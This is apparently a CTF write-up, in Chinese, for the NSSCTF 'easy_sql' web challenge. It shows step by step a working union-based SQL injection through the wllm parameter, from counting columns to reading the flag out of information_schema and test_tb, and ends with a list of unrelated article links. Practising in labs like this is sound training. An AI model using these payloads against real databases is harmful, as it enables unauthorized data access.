[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析

查看网页

有提示,参数是wllm,并且要我们输入点东西

所以,我们尝试以get方式传入

有回显,但似乎没啥用

从上图看应该是字符型漏洞,单引号字符注入

先查看字段数

复制代码
/?wllm=2'order by 3--+

没回显

报错了,说明字段数是3

然后查看回显点

复制代码
/?wllm=2'union select 1,2,3--+

注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。

然后查看数据库名称

复制代码
/?wllm=2'union select 1,2,database()--+

得到数据库名称就可以按顺序数据库-表-列来找flag了

复制代码
/?wllm=2'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
复制代码
?wllm=2'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
复制代码
/?wllm=2'union select 1,2,flag from test_tb--+
相关推荐
风中芦苇啊7 小时前
从直接生成到受控配置:新一代图表Agent的SQL安全生成范式
数据库·sql·安全
吴声子夜歌7 小时前
SQL进阶——窗口函数
数据库·sql
泛普软件8 小时前
企业项目管理软件如何选型?统筹多项目资源把控交付与盈利水平
大数据·安全
云水一下10 小时前
DVWA从入门到精通(四):CSRF(跨站请求伪造)
安全·csrf·dvwa
tuddy78946410 小时前
Codex++ 安全边界探秘:从模型能力到风险防御
人工智能·python·安全
hbugs00110 小时前
【案例分享】全网首个华三数据中心流量可视化实验,基于EVE-NG V7平台
网络·网络协议·安全·devops·eve-ng
深盾科技_Virbox10 小时前
深盾科技·Virbox产品体系全景解读:软件安全如何从加密锁走向全生命周期
java·大数据·算法·安全·软件需求
云边云科技_云网融合11 小时前
零信任安全:数字化时代的企业防护新范式
人工智能·安全·ai
菩提小狗11 小时前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
thinking_talk11 小时前
腾讯云AI Agent安全中心综合评测
人工智能·安全·腾讯云